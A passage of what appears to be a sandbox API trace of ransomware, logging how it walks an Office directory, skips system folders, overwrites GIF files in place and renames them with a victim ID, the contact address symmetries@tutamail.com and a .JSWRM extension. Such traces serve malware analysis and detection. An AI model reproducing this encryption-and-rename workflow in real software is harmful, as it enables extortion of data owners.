Flags=0x0, Size=0x10) returned 0x23a300 [0120.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0120.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0120.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0120.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0120.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.265] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR2F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir2f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR2F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir2f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0120.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0120.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0120.266] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadfda74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadfda74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x905a, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR30F.GIF", cAlternateFileName="")) returned 1 [0120.266] lstrcmpiW (lpString1="ZPDIR30F.GIF", lpString2=".") returned 1 [0120.266] lstrcmpiW (lpString1="ZPDIR30F.GIF", lpString2="..") returned 1 [0120.266] lstrcmpiW (lpString1="ZPDIR30F.GIF", lpString2="...") returned 1 [0120.266] lstrcmpiW (lpString1="ZPDIR30F.GIF", lpString2="windows") returned 1 [0120.266] lstrcmpiW (lpString1="ZPDIR30F.GIF", lpString2="recovery") returned 1 [0120.266] lstrcmpiW (lpString1="ZPDIR30F.GIF", lpString2="perflogs") returned 1 [0120.266] lstrcmpiW (lpString1="ZPDIR30F.GIF", lpString2="documents and settings") returned 1 [0120.266] lstrcmpiW (lpString1="ZPDIR30F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.266] lstrcmpiW (lpString1="ZPDIR30F.GIF", lpString2="system volume information") returned 1 [0120.266] lstrcmpiW (lpString1="ZPDIR30F.GIF", lpString2="msocache") returned 1 [0120.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0120.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR30F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR30F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR30F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0120.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0120.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR30F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR30F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR30F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0120.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0120.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0120.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0120.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR30F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir30f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.267] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=36954) returned 1 [0120.267] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9050) returned 0x24e1d8 [0120.267] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x9050, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x9050, lpOverlapped=0x0) returned 1 [0120.273] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.273] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x9050, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x9050, lpOverlapped=0x0) returned 1 [0120.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.273] CloseHandle (hObject=0x314) returned 1 [0120.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0120.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0120.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0120.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0120.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0120.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0120.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0120.274] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR30F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir30f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR30F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir30f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0120.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0120.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0120.275] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadfda74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadfda74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b6e, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR31F.GIF", cAlternateFileName="")) returned 1 [0120.275] lstrcmpiW (lpString1="ZPDIR31F.GIF", lpString2=".") returned 1 [0120.275] lstrcmpiW (lpString1="ZPDIR31F.GIF", lpString2="..") returned 1 [0120.275] lstrcmpiW (lpString1="ZPDIR31F.GIF", lpString2="...") returned 1 [0120.275] lstrcmpiW (lpString1="ZPDIR31F.GIF", lpString2="windows") returned 1 [0120.275] lstrcmpiW (lpString1="ZPDIR31F.GIF", lpString2="recovery") returned 1 [0120.275] lstrcmpiW (lpString1="ZPDIR31F.GIF", lpString2="perflogs") returned 1 [0120.275] lstrcmpiW (lpString1="ZPDIR31F.GIF", lpString2="documents and settings") returned 1 [0120.275] lstrcmpiW (lpString1="ZPDIR31F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.275] lstrcmpiW (lpString1="ZPDIR31F.GIF", lpString2="system volume information") returned 1 [0120.275] lstrcmpiW (lpString1="ZPDIR31F.GIF", lpString2="msocache") returned 1 [0120.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR31F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR31F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR31F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0120.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR31F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR31F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR31F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0120.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0120.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0120.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0120.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR31F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir31f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.276] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=15214) returned 1 [0120.276] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3b60) returned 0x24e1d8 [0120.276] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x3b60, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x3b60, lpOverlapped=0x0) returned 1 [0120.278] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.278] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x3b60, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x3b60, lpOverlapped=0x0) returned 1 [0120.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.279] CloseHandle (hObject=0x314) returned 1 [0120.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0120.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0120.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0120.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0120.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.279] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR31F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir31f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR31F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir31f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0120.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0120.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0120.280] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadfda74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadfda74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9eb1, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR32F.GIF", cAlternateFileName="")) returned 1 [0120.280] lstrcmpiW (lpString1="ZPDIR32F.GIF", lpString2=".") returned 1 [0120.280] lstrcmpiW (lpString1="ZPDIR32F.GIF", lpString2="..") returned 1 [0120.280] lstrcmpiW (lpString1="ZPDIR32F.GIF", lpString2="...") returned 1 [0120.280] lstrcmpiW (lpString1="ZPDIR32F.GIF", lpString2="windows") returned 1 [0120.280] lstrcmpiW (lpString1="ZPDIR32F.GIF", lpString2="recovery") returned 1 [0120.280] lstrcmpiW (lpString1="ZPDIR32F.GIF", lpString2="perflogs") returned 1 [0120.280] lstrcmpiW (lpString1="ZPDIR32F.GIF", lpString2="documents and settings") returned 1 [0120.280] lstrcmpiW (lpString1="ZPDIR32F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.280] lstrcmpiW (lpString1="ZPDIR32F.GIF", lpString2="system volume information") returned 1 [0120.280] lstrcmpiW (lpString1="ZPDIR32F.GIF", lpString2="msocache") returned 1 [0120.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR32F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR32F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR32F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0120.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR32F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR32F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR32F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0120.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0120.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0120.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0120.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR32F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir32f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.281] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=40625) returned 1 [0120.282] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9eb0) returned 0x24e1d8 [0120.282] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x9eb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x9eb0, lpOverlapped=0x0) returned 1 [0120.289] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.289] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x9eb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x9eb0, lpOverlapped=0x0) returned 1 [0120.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.290] CloseHandle (hObject=0x314) returned 1 [0120.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0120.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0120.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0120.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0120.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0120.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0120.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.290] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR32F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir32f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR32F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir32f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0120.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0120.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 